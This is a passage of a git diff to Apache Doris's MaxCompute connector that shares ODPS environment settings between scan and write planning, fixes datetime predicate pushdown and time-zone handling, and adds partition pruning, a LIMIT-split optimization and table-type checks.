Note: EnvironmentSettings and SplitOptions (from odps-sdk-table-api) - * are managed by {@link MaxComputeScanPlanProvider} which handles scan planning. + *

Note: the shared ODPS {@link EnvironmentSettings} (from odps-sdk-table-api) + * is built here and consumed by both {@link MaxComputeScanPlanProvider} and + * {@link MaxComputeWritePlanProvider}; SplitOptions remains scan-specific and + * stays in the scan plan provider. */ public class MaxComputeDorisConnector implements Connector { private static final Logger LOG = LogManager.getLogger( @@ -49,9 +59,12 @@ public class MaxComputeDorisConnector implements Connector { private Odps odps; private String endpoint; private String defaultProject; + private boolean enableNamespaceSchema; private String quota; private McStructureHelper structureHelper; private MaxComputeScanPlanProvider scanPlanProvider; + private MaxComputeWritePlanProvider writePlanProvider; + private EnvironmentSettings settings; private volatile boolean initialized; @@ -96,21 +109,87 @@ private void doInit() { } odps.setAccountFormat(accountFormat); - boolean enableNamespaceSchema = Boolean.parseBoolean( + enableNamespaceSchema = Boolean.parseBoolean( properties.getOrDefault( MCConnectorProperties.ENABLE_NAMESPACE_SCHEMA, MCConnectorProperties .DEFAULT_ENABLE_NAMESPACE_SCHEMA)); structureHelper = McStructureHelper.getHelper( enableNamespaceSchema, defaultProject); + settings = buildSettings(); scanPlanProvider = new MaxComputeScanPlanProvider(this); + writePlanProvider = new MaxComputeWritePlanProvider(this); + } + + /** + * Builds the shared ODPS {@link EnvironmentSettings} (credentials, endpoint, + * quota, REST timeouts). Mirrors the legacy {@code MaxComputeExternalCatalog} + * which holds a single {@code settings} used by both the scan path + * ({@code MaxComputeScanNode}) and the write path ({@code MCTransaction}); + * the connector likewise shares one instance across + * {@link MaxComputeScanPlanProvider} and {@link MaxComputeWritePlanProvider}. + */ + private EnvironmentSettings buildSettings() { + int connectTimeout = Integer.parseInt(properties.getOrDefault( + MCConnectorProperties.CONNECT_TIMEOUT, + MCConnectorProperties.DEFAULT_CONNECT_TIMEOUT)); + int readTimeout = Integer.parseInt(properties.getOrDefault( + MCConnectorProperties.READ_TIMEOUT, + MCConnectorProperties.DEFAULT_READ_TIMEOUT)); + int retryTimes = Integer.parseInt(properties.getOrDefault( + MCConnectorProperties.RETRY_COUNT, + MCConnectorProperties.DEFAULT_RETRY_COUNT)); + + // Apply the same timeouts to the raw ODPS client: metadata / project / schema / DDL and the + // CREATE-time connectivity test (testConnection) go through odps.getRestClient(), not the + // Storage API. Mirrors legacy MaxComputeExternalCatalog.initLocalObjectsImpl; the RestOptions + // below cover only the Storage API EnvironmentSettings used by the scan/write paths. + odps.getRestClient().setConnectTimeout(connectTimeout); + odps.getRestClient().setReadTimeout(readTimeout); + odps.getRestClient().setRetryTimes(retryTimes); + + RestOptions restOptions = RestOptions.newBuilder() + .withConnectTimeout(connectTimeout) + .withReadTimeout(readTimeout) + .withRetryTimes(retryTimes) + .build(); + + Credentials credentials = Credentials.newBuilder() + .withAccount(odps.getAccount()) + .withAppAccount(odps.getAppAccount()) + .build(); + + return EnvironmentSettings.newBuilder() + .withCredentials(credentials) + .withServiceEndpoint(odps.getEndpoint()) + .withQuotaName(quota) + .withRestOptions(restOptions) + .build(); } @Override public ConnectorMetadata getMetadata(ConnectorSession session) { ensureInitialized(); return new MaxComputeConnectorMetadata( - odps, structureHelper, defaultProject); + odps, structureHelper, defaultProject, endpoint, quota, properties); + } + + /** + * MaxCompute writes use multiple parallel writers, and dynamic-partition writes must be + * hash-distributed and locally sorted by the partition columns: the ODPS Storage API streams + * partition writers and closes the previous one when a new partition value appears, so + * un-grouped rows trigger "writer has been closed". These two capabilities drive the planner + * sink distribution ({@code PhysicalConnectorTableSink.getRequirePhysicalProperties}), mirroring + * the legacy {@code PhysicalMaxComputeTableSink}. + */ + @Override + public Set getCapabilities() { + return EnumSet.of(ConnectorCapability.SUPPORTS_PARALLEL_WRITE, + ConnectorCapability.SINK_REQUIRE_PARTITION_LOCAL_SORT, + // MaxCompute's columnar Storage API / JNI writer maps data positionally against the + // full table schema, so the sink must project rows to full-schema order (see + // BindSink.bindConnectorTableSink); not declared by name-mapped connectors like JDBC. + ConnectorCapability.SINK_REQUIRE_FULL_SCHEMA_ORDER); } @Override @@ -119,19 +198,74 @@ public ConnectorScanPlanProvider getScanPlanProvider() { return scanPlanProvider; } + @Override + public ConnectorWritePlanProvider getWritePlanProvider() { + ensureInitialized(); + return writePlanProvider; + } + @Override public ConnectorTestResult testConnection(ConnectorSession session) { try { ensureInitialized(); - odps.projects().exists(defaultProject); + validateMaxComputeConnection(); return ConnectorTestResult.success( "MaxCompute project '" + defaultProject + "' is accessible"); } catch (Exception e) { - return ConnectorTestResult.failure( - "MaxCompute connection test failed: " + e.getMessage()); + return ConnectorTestResult.failure(e.getMessage()); } } + /** + * Validates FE→ODPS connectivity for CREATE CATALOG (test_connection=true), mirroring + * legacy {@code MaxComputeExternalCatalog.validateMaxComputeConnection}. When namespace schema + * is enabled the project is three-tier, so the schema list must be reachable; otherwise the + * project itself must exist and be accessible. + */ + protected void validateMaxComputeConnection() { + if (enableNamespaceSchema) { + validateMaxComputeProjectAndNamespaceSchema(); + } else { + validateMaxComputeProject(); + } + } + + private void validateMaxComputeProject() { + boolean projectExists; + try { + projectExists = maxComputeProjectExists(defaultProject); + } catch (Exception e) { + throw new RuntimeException("Failed to validate MaxCompute project '" + defaultProject + + "'. Check " + MCConnectorProperties.PROJECT + ", " + MCConnectorProperties.ENDPOINT + + " and credentials. Cause: " + e.getMessage(), e); + } + if (!projectExists) { + throw new RuntimeException("Failed to validate MaxCompute project '" + defaultProject + + "'. Check " + MCConnectorProperties.PROJECT + ", " + MCConnectorProperties.ENDPOINT + + " and credentials. Cause: project does not exist or is not accessible"); + } + } + + private void validateMaxComputeProjectAndNamespaceSchema() { + try { + validateMaxComputeNamespaceSchemaAccess(defaultProject); + } catch (Exception e) { + throw new RuntimeException("Failed to validate MaxCompute project '" + defaultProject + + "' with namespace schema. Check " + MCConnectorProperties.PROJECT + ", " + + MCConnectorProperties.ENDPOINT + + ", credentials, and whether the schema list is accessible for the namespace " + + "schema configuration. Cause: " + e.getMessage(), e); + } + } + + protected boolean maxComputeProjectExists(String projectName) throws OdpsException { + return odps.projects().exists(projectName); + } + + protected void validateMaxComputeNamespaceSchemaAccess(String projectName) throws OdpsException { + odps.schemas().iterator(projectName).hasNext(); + } + public Odps getClient() { ensureInitialized(); return odps; @@ -161,6 +295,15 @@ public McStructureHelper getStructureHelper() { return structureHelper; } + /** + * Returns the shared ODPS {@link EnvironmentSettings} used by both scan and + * write planning (see {@link #buildSettings()}). + */ + public EnvironmentSettings getSettings() { + ensureInitialized(); + return settings; + } + @Override public void close() throws IOException { LOG.info("Closing MaxCompute connector for project: {}", diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverter.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverter.java index 6e6c1911ab8392..02e59cfc33aaae 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverter.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverter.java @@ -38,7 +38,6 @@ import java.time.LocalDateTime; import java.time.ZoneId; -import java.time.ZonedDateTime; import java.time.format.DateTimeFormatter; import java.util.ArrayList; import java.util.List; @@ -56,21 +55,29 @@ public class MaxComputePredicateConverter { DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss.SSS"); static final DateTimeFormatter DATETIME_6_FORMATTER = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss.SSSSSS"); + private static final ZoneId UTC = ZoneId.of("UTC"); private final Map columnTypeMap; private final boolean dateTimePushDown; - private final ZoneId sourceTimeZone; + private final String sourceTimeZoneId; /** * @param columnTypeMap mapping from column name to ODPS type * @param dateTimePushDown whether DATETIME/TIMESTAMP predicate push down is enabled - * @param sourceTimeZone the session time zone for datetime conversion + * @param sourceTimeZoneId the session time zone id (e.g. "Asia/Shanghai"), kept as the raw + * string and parsed lazily — only when a DATETIME/TIMESTAMP literal is actually + * converted, inside {@link #convert}'s catch. This matters because Doris accepts and + * stores some zone ids verbatim that {@link ZoneId#of(String)} rejects (e.g. "CST", + * which Doris maps to +08:00 via its own alias map); parsing eagerly would throw out of + * query planning, whereas lazy parsing degrades the predicate to + * {@link Predicate#NO_PREDICATE} — mirroring legacy {@code MaxComputeScanNode}'s + * per-conjunct catch (a non-datetime predicate under such a session still pushes down). */ public MaxComputePredicateConverter(Map columnTypeMap, - boolean dateTimePushDown, ZoneId sourceTimeZone) { + boolean dateTimePushDown, String sourceTimeZoneId) { this.columnTypeMap = columnTypeMap; this.dateTimePushDown = dateTimePushDown; - this.sourceTimeZone = sourceTimeZone; + this.sourceTimeZoneId = sourceTimeZoneId; } /** @@ -202,7 +209,12 @@ private String formatLiteralValue(String columnName, ConnectorExpression expr) { OdpsType odpsType = columnTypeMap.get(columnName); if (odpsType == null) { - return " \"" + rawValue + "\" "; + // Column not in the table schema: mirror legacy MaxComputeScanNode's + // containsKey guard (throw AnalysisException -> caller drops the predicate). + // Throwing here degrades the filter to NO_PREDICATE via convert()'s catch, + // so we never push down a malformed predicate on an unknown column. + throw new UnsupportedOperationException( + "Cannot push down predicate on unknown column: " + columnName); } switch (odpsType) { @@ -226,21 +238,24 @@ private String formatLiteralValue(String columnName, ConnectorExpression expr) { case DATETIME: if (dateTimePushDown) { - return " \"" + convertDateTimezone( - rawValue, DATETIME_3_FORMATTER, ZoneId.of("UTC")) + "\" "; + return " \"" + formatDateTimeLiteral( + literal.getValue(), DATETIME_3_FORMATTER, true) + "\" "; } break; case TIMESTAMP: if (dateTimePushDown) { - return " \"" + convertDateTimezone( - rawValue, DATETIME_6_FORMATTER, ZoneId.of("UTC")) + "\" "; + return " \"" + formatDateTimeLiteral( + literal.getValue(), DATETIME_6_FORMATTER, true) + "\" "; } break; case TIMESTAMP_NTZ: if (dateTimePushDown) { - return " \"" + rawValue + "\" "; + // TIMESTAMP_NTZ carries no timezone: mirror legacy + // MaxComputeScanNode:585-592 (getStringValue with NO convertDateTimezone). + return " \"" + formatDateTimeLiteral( + literal.getValue(), DATETIME_6_FORMATTER, false) + "\" "; } break; @@ -251,14 +266,45 @@ private String formatLiteralValue(String columnName, ConnectorExpression expr) { "Cannot push down ODPS type: " + odpsType + " for column " + columnName); } - private String convertDateTimezone(String dateTimeStr, - DateTimeFormatter formatter, ZoneId toZone) { - if (sourceTimeZone.equals(toZone)) { - return dateTimeStr; + /** + * Formats a DATETIME/TIMESTAMP/TIMESTAMP_NTZ literal into the ODPS predicate string. + * + *

The {@code value} is the {@link LocalDateTime} produced by fe-core's + * {@code ExprToConnectorExpressionConverter.convertDateLiteral} (already at the bound + * predicate's scale, with nanos = microsecond * 1000). It is formatted directly with + * {@code formatter} (space-separated, fixed precision: DATETIME {@code .SSS}, + * TIMESTAMP/TIMESTAMP_NTZ {@code .SSSSSS}), reproducing legacy + * {@code MaxComputeScanNode.convertLiteralToOdpsValues}'s + * {@code DateLiteral.getStringValue(DatetimeV2Type(3|6))}.

+ * + *

Formatting the {@code LocalDateTime} directly avoids the previous defect where + * {@code String.valueOf(value)} emitted {@link LocalDateTime#toString()}'s 'T'-separated, + * variable-precision form (e.g. {@code "2023-02-02T00:00"}) — which the space-separated + * formatter could not parse (whole predicate tree dropped to {@code NO_PREDICATE}) or, on + * the UTC short-circuit, was pushed malformed to ODPS.

+ * + * @param convertTimeZone {@code true} for DATETIME/TIMESTAMP (legacy converts the session + * {@code sourceTimeZone} to UTC, short-circuiting when already UTC); {@code false} + * for TIMESTAMP_NTZ (legacy does not convert) + */ + private String formatDateTimeLiteral(Object value, DateTimeFormatter formatter, + boolean convertTimeZone) { + if (!(value instanceof LocalDateTime)) { + throw new UnsupportedOperationException( + "Expected LocalDateTime for datetime predicate, got: " + + (value == null ? "null" : value.getClass().getSimpleName())); + } + LocalDateTime localDateTime = (LocalDateTime) value; + if (convertTimeZone) { + // Parse the session zone here (inside convert()'s catch) rather than eagerly at + // construction: a Doris-valid-but-ZoneId-invalid id (e.g. "CST") then degrades this + // predicate to NO_PREDICATE instead of throwing out of query planning. + ZoneId sourceTimeZone = ZoneId.of(sourceTimeZoneId); + if (!sourceTimeZone.equals(UTC)) { + localDateTime = localDateTime.atZone(sourceTimeZone) + .withZoneSameInstant(UTC).toLocalDateTime(); + } } - LocalDateTime localDateTime = LocalDateTime.parse(dateTimeStr, formatter); - ZonedDateTime sourceZoned = localDateTime.atZone(sourceTimeZone); - ZonedDateTime targetZoned = sourceZoned.withZoneSameInstant(toZone); - return targetZoned.format(formatter); + return localDateTime.format(formatter); } } diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java index e3c65f934782c2..6cf9fb69a5bad7 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java @@ -20,7 +20,12 @@ import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorAnd; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.api.pushdown.ConnectorIn; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.api.scan.ConnectorScanRange; @@ -30,9 +35,7 @@ import com.aliyun.odps.table.TableIdentifier; import com.aliyun.odps.table.configuration.ArrowOptions; import com.aliyun.odps.table.configuration.ArrowOptions.TimestampUnit; -import com.aliyun.odps.table.configuration.RestOptions; import com.aliyun.odps.table.configuration.SplitOptions; -import com.aliyun.odps.table.enviroment.Credentials; import com.aliyun.odps.table.enviroment.EnvironmentSettings; import com.aliyun.odps.table.optimizer.predicate.Predicate; import com.aliyun.odps.table.read.TableBatchReadSession; @@ -46,7 +49,6 @@ import java.io.IOException; import java.io.ObjectOutputStream; import java.io.Serializable; -import java.time.ZoneId; import java.util.ArrayList; import java.util.Base64; import java.util.Collections; @@ -71,6 +73,16 @@ public class MaxComputeScanPlanProvider implements ConnectorScanPlanProvider { private static final Logger LOG = LogManager.getLogger(MaxComputeScanPlanProvider.class); + /** + * FE session variable name gating the LIMIT-split optimization (default OFF). Hardcoded + * here because the connector must not depend on fe-core's {@code SessionVariable} constant; + * it is read from {@link ConnectorSession#getSessionProperties()} (same pattern the JDBC + * connector uses for its session vars). Must stay byte-identical to + * {@code SessionVariable.ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION}. + */ + private static final String ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION = + "enable_mc_limit_split_optimization"; + private final MaxComputeDorisConnector connector; // These are initialized lazily from connector properties @@ -143,23 +155,9 @@ private void initFromProperties() { .build(); } - RestOptions restOptions = RestOptions.newBuilder() - .withConnectTimeout(connectTimeout) - .withReadTimeout(readTimeout) - .withRetryTimes(retryTimes) - .build(); - - Credentials credentials = Credentials.newBuilder() - .withAccount(connector.getClient().getAccount()) - .withAppAccount(connector.getClient().getAppAccount()) - .build(); - - settings = EnvironmentSettings.newBuilder() - .withCredentials(credentials) - .withServiceEndpoint(connector.getClient().getEndpoint()) - .withQuotaName(connector.getQuota()) - .withRestOptions(restOptions) - .build(); + // EnvironmentSettings is built once on the connector and shared by both + // the scan and write plan providers (mirrors legacy catalog.getSettings()). + settings = connector.getSettings(); } @Override @@ -173,10 +171,21 @@ public List planScan(ConnectorSession session, public List planScan(ConnectorSession session, ConnectorTableHandle handle, List columns, Optional filter, long limit) { + return planScan(session, handle, columns, filter, limit, null); + } + + @Override + public List planScan(ConnectorSession session, + ConnectorTableHandle handle, List columns, + Optional filter, long limit, List requiredPartitions) { ensureInitialized(); MaxComputeTableHandle mcHandle = (MaxComputeTableHandle) handle; Table odpsTable = mcHandle.getOdpsTable(); + // Reject external tables / logical views before any read planning (mirrors legacy + // MaxComputeScanNode.getSplits): the ODPS Storage API cannot scan them. + mcHandle.checkOperationSupported("Reading"); + if (odpsTable.getFileNum() <= 0 || columns.isEmpty()) { return Collections.emptyList(); } @@ -197,31 +206,76 @@ public List planScan(ConnectorSession session, } // Convert filter to ODPS predicate - Predicate filterPredicate = convertFilter(filter, odpsTable); - - // Check limit optimization eligibility - boolean onlyPartitionEquality = filter.isPresent() - && checkOnlyPartitionEquality(filter.get(), partitionColumnNames); - boolean useLimitOpt = limit > 0 && (onlyPartitionEquality || !filter.isPresent()); + Predicate filterPredicate = convertFilter(filter, odpsTable, session); + + // Partition pruning: restrict the read session to the pruned partitions when present. + // null/empty => not pruned => scan all (mirrors legacy MaxComputeScanNode's empty + // requiredPartitionSpecs). The "pruned to zero" case is short-circuited upstream in + // PluginDrivenScanNode.getSplits, so it never reaches here. + List requiredPartitionSpecs = toPartitionSpecs(requiredPartitions); + + // Check limit optimization eligibility. Mirrors legacy MaxComputeScanNode's three-gate + // (sessionVariable.enableMcLimitSplitOptimization && onlyPartitionEqualityPredicate + // && hasLimit()), default OFF: the optimization fires only when the user enabled the + // session var AND (there is no filter OR every conjunct is partition-column equality). + boolean limitOptEnabled = isLimitOptEnabled(session.getSessionProperties()); + boolean useLimitOpt = shouldUseLimitOptimization( + limitOptEnabled, limit, filter, partitionColumnNames); try { if (useLimitOpt) { return planScanWithLimitOptimization(mcHandle.getTableIdentifier(), requiredPartitionCols, requiredDataCols, - filterPredicate, limit, odpsTable); + filterPredicate, limit, requiredPartitionSpecs, odpsTable); } TableBatchReadSession readSession = createReadSession( mcHandle.getTableIdentifier(), requiredPartitionCols, requiredDataCols, - filterPredicate, Collections.emptyList(), splitOptions); + filterPredicate, requiredPartitionSpecs, splitOptions); return buildSplitsFromSession(readSession, odpsTable); } catch (IOException e) { throw new RuntimeException("Failed to create MaxCompute read session", e); } } - private Predicate convertFilter(Optional filter, Table odpsTable) { + /** + * Mirrors legacy {@code MaxComputeScanNode.isBatchMode()}'s {@code odpsTable.getFileNum() > 0} + * gate. The partition-count / non-empty-slots / session-var gates live in the generic scan + * node ({@code PluginDrivenScanNode.isBatchMode}); this method only answers the + * connector-specific "does this table have files to read in batches" question. + * + *

{@code planScanForPartitionBatch} is intentionally NOT overridden: the SPI default + * delegates to the 6-arg {@link #planScan}, which already builds one read session over the + * given partition subset — exactly the per-batch behaviour legacy {@code startSplit} got from + * {@code createTableBatchReadSession}.

+ */ + @Override + public boolean supportsBatchScan(ConnectorSession session, ConnectorTableHandle handle) { + return ((MaxComputeTableHandle) handle).getOdpsTable().getFileNum() > 0; + } + + /** + * Converts pruned partition spec strings (the keys of the Nereids selected-partition map, + * e.g. {@code "pt=1,region=cn"}) into ODPS {@link com.aliyun.odps.PartitionSpec}s. + * Mirrors legacy {@code MaxComputeScanNode}'s {@code new PartitionSpec(key)} conversion. + * + *

{@code null} or empty input returns an empty list, which the ODPS read session + * builder treats as "read all partitions" — preserving the pre-pruning behavior.

+ */ + static List toPartitionSpecs(List requiredPartitions) { + if (requiredPartitions == null || requiredPartitions.isEmpty()) { + return Collections.emptyList(); + } + List specs = new ArrayList<>(requiredPartitions.size()); + for (String name : requiredPartitions) { + specs.add(new com.aliyun.odps.PartitionSpec(name)); + } + return specs; + } + + private Predicate convertFilter(Optional filter, Table odpsTable, + ConnectorSession session) { if (!filter.isPresent()) { return Predicate.NO_PREDICATE; } @@ -234,16 +288,19 @@ private Predicate convertFilter(Optional filter, Table odps columnTypeMap.put(col.getName(), col.getType()); } - ZoneId sourceZone = resolveProjectTimeZone(); + // Source time zone = the session time zone, mirroring legacy + // MaxComputeScanNode.convertDateTimezone's DateUtils.getTimeZone() (= the session var). + // ConnectorSession.getTimeZone() is populated from ctx.getSessionVariable().getTimeZone() + // by ConnectorSessionBuilder.from(ctx), so this is the same source as legacy. (The earlier + // project-region TZ from the endpoint was wrong: Doris interprets datetime literals in the + // session TZ, so converting from any other zone shifts the pushed-down UTC literal.) The id + // is passed raw and parsed lazily inside the converter, so a Doris-valid-but-ZoneId-invalid + // value (e.g. "CST") degrades the datetime predicate instead of failing the query. MaxComputePredicateConverter converter = new MaxComputePredicateConverter( - columnTypeMap, dateTimePushDown, sourceZone); + columnTypeMap, dateTimePushDown, session.getTimeZone()); return converter.convert(filter.get()); } - private ZoneId resolveProjectTimeZone() { - return MCConnectorEndpoint.resolveProjectTimeZone(connector.getEndpoint()); - } - private TableBatchReadSession createReadSession( TableIdentifier tableId, List partitionCols, List dataCols, @@ -281,7 +338,11 @@ private List buildSplitsFromSession( for (com.aliyun.odps.table.read.split.InputSplit split : assigner.getAllSplits()) { result.add(MaxComputeScanRange.builder() .start(((IndexedInputSplit) split).getSplitIndex()) - .length(splitByteSize) + // -1 is the BE sentinel that distinguishes BYTE_SIZE from ROW_OFFSET + // splits (MaxComputeJniScanner: split_size == -1 => BYTE_SIZE). The real + // byte size lives in the session, not the range; mirrors legacy + // MaxComputeScanNode's MaxComputeSplit(..., length=-1, ...). + .length(-1L) .scanSerialize(serialized) .sessionId(split.getSessionId()) .splitType(MaxComputeScanRange.SPLIT_TYPE_BYTE_SIZE) @@ -319,6 +380,7 @@ private List planScanWithLimitOptimization( TableIdentifier tableId, List partitionCols, List dataCols, Predicate filterPredicate, long limit, + List requiredPartitions, Table odpsTable) throws IOException { long t0 = System.currentTimeMillis(); @@ -329,7 +391,7 @@ private List planScanWithLimitOptimization( TableBatchReadSession readSession = createReadSession( tableId, partitionCols, dataCols, - filterPredicate, Collections.emptyList(), rowOffsetOptions); + filterPredicate, requiredPartitions, rowOffsetOptions); String serialized = serializeSession(readSession); InputSplitAssigner assigner = readSession.getInputSplitAssigner(); @@ -362,18 +424,90 @@ private List planScanWithLimitOptimization( } /** - * Check if all filter predicates are partition-column equality predicates. - * This enables the limit optimization path. + * Gate (1): reads the {@code enable_mc_limit_split_optimization} session variable + * (default {@code false}). Map-typed for direct unit testing without a live session. + */ + static boolean isLimitOptEnabled(Map sessionProperties) { + return Boolean.parseBoolean( + sessionProperties.getOrDefault(ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION, "false")); + } + + /** + * Whether the LIMIT-split optimization is eligible, mirroring legacy + * {@code MaxComputeScanNode}'s {@code enableMcLimitSplitOptimization + * && onlyPartitionEqualityPredicate && hasLimit()} (default OFF). Pure → unit-testable. + * + * @param limitOptEnabled gate (1): the session var value + * @param limit gate (3): {@code > 0} means a LIMIT is present + * @param filter the pushed-down filter; empty means no predicate + * @param partitionColumnNames the table's partition column names + */ + static boolean shouldUseLimitOptimization(boolean limitOptEnabled, long limit, + Optional filter, Set partitionColumnNames) { + if (!limitOptEnabled || limit <= 0) { + return false; + } + if (!filter.isPresent()) { + // No predicate: every row qualifies, so the first min(limit, total) rows are correct. + return true; + } + return checkOnlyPartitionEquality(filter.get(), partitionColumnNames); + } + + /** + * Gate (2): true iff every conjunct in {@code expr} is a partition-column equality + * ({@code partcol = literal}) or partition-column IN-list ({@code partcol IN (literal, ...)}). + * Mirrors legacy {@code MaxComputeScanNode.checkOnlyPartitionEqualityPredicate()}: when this + * holds, every row in the (pruned) partitions qualifies, so reading the first {@code limit} + * rows by row offset is correct. + * + *

The empty-filter case is handled upstream in {@link #shouldUseLimitOptimization} + * (legacy treats empty conjuncts as eligible).

*/ - private boolean checkOnlyPartitionEquality(ConnectorExpression expr, + static boolean checkOnlyPartitionEquality(ConnectorExpression expr, Set partitionColumnNames) { - // Conservative: return false to disable limit optimization when filter is complex. - // The full check would walk the expression tree to verify all leaves are - // partition_col = literal or partition_col IN (literal, ...). - // For the first iteration, we keep it simple and always return false. + if (expr instanceof ConnectorAnd) { + for (ConnectorExpression conjunct : ((ConnectorAnd) expr).getConjuncts()) { + if (!isPartitionEqualityLeaf(conjunct, partitionColumnNames)) { + return false; + } + } + return true; + } + return isPartitionEqualityLeaf(expr, partitionColumnNames); + } + + private static boolean isPartitionEqualityLeaf(ConnectorExpression expr, + Set partitionColumnNames) { + // partcol = literal (mirror legacy: column on the LEFT, literal on the RIGHT, EQ only). + if (expr instanceof ConnectorComparison) { + ConnectorComparison cmp = (ConnectorComparison) expr; + return cmp.getOperator() == ConnectorComparison.Operator.EQ + && isPartitionColumnRef(cmp.getLeft(), partitionColumnNames) + && cmp.getRight() instanceof ConnectorLiteral; + } + // partcol IN (literal, ...) (not NOT-IN; all list elements must be literals). + if (expr instanceof ConnectorIn) { + ConnectorIn in = (ConnectorIn) expr; + if (in.isNegated() || !isPartitionColumnRef(in.getValue(), partitionColumnNames)) { + return false; + } + for (ConnectorExpression item : in.getInList()) { + if (!(item instanceof ConnectorLiteral)) { + return false; + } + } + return true; + } return false; } + private static boolean isPartitionColumnRef(ConnectorExpression expr, + Set partitionColumnNames) { + return expr instanceof ConnectorColumnRef + && partitionColumnNames.contains(((ConnectorColumnRef) expr).getColumnName()); + } + private static String serializeSession(Serializable object) throws IOException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(baos); diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeTableHandle.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeTableHandle.java index 6d1b4f70b4ef87..d61672494803ed 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeTableHandle.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeTableHandle.java @@ -17,6 +17,7 @@ package org.apache.doris.connector.maxcompute; +import org.apache.doris.connector.api.DorisConnectorException; import org.apache.doris.connector.api.handle.ConnectorTableHandle; import com.aliyun.odps.Table; @@ -59,4 +60,27 @@ public Table getOdpsTable() { public TableIdentifier getTableIdentifier() { return tableIdentifier; } + + /** + * Rejects read/write on a MaxCompute external table or logical view: the ODPS Storage API + * used by the scan ({@link MaxComputeScanPlanProvider#planScan}) and write + * ({@link MaxComputeWritePlanProvider#planWrite}) paths only handles managed/internal tables. + * Mirrors legacy {@code MaxComputeExternalTable.isUnsupportedOdpsTable} and the guards added in + * {@code MaxComputeScanNode.getSplits} / {@code MCTransaction.beginInsert}. + * + * @param operation the gerund used in the error message, "Reading" or "Writing" + */ + public void checkOperationSupported(String operation) { + checkOperationSupported(odpsTable.isExternalTable(), odpsTable.isVirtualView(), + operation, dbName, tableName); + } + + static void checkOperationSupported(boolean isExternalTable, boolean isVirtualView, + String operation, String dbName, String tableName) { + if (isExternalTable || isVirtualView) { + throw new DorisConnectorException(operation + + " MaxCompute external table or logical view is not supported: " + + dbName + "." + tableName); + } + } } diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeWritePlanProvider.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeWritePlanProvider.java new file mode 100644 index 00000000000000..1c19bb9c6b5406 --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeWritePlanProvider.java @@ -0,0 +1,233 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.handle.ConnectorTransaction; +import org.apache.doris.connector.api.handle.ConnectorWriteHandle; +import org.apache.doris.connector.api.write.ConnectorSinkPlan; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; +import org.apache.doris.thrift.TDataSink; +import org.apache.doris.thrift.TDataSinkType; +import org.apache.doris.thrift.TMaxComputeTableSink; + +import com.aliyun.odps.Column; +import com.aliyun.odps.PartitionSpec; +import com.aliyun.odps.Table; +import com.aliyun.odps.table.TableIdentifier; +import com.aliyun.odps.table.configuration.ArrowOptions; +import com.aliyun.odps.table.configuration.ArrowOptions.TimestampUnit; +import com.aliyun.odps.table.configuration.DynamicPartitionOptions; +import com.aliyun.odps.table.enviroment.EnvironmentSettings; +import com.aliyun.odps.table.write.TableBatchWriteSession; +import com.aliyun.odps.table.write.TableWriteSessionBuilder; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.IOException; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.stream.Collectors; + +/** + * Write plan provider for MaxCompute (ODPS). + * + *

Builds the opaque {@link TMaxComputeTableSink} for a bound DML write: it + * creates the ODPS Storage API write session, binds it to the current connector + * transaction (so commit / block allocation can act on it), and stamps the + * engine transaction id and write session id into the sink.

+ * + *

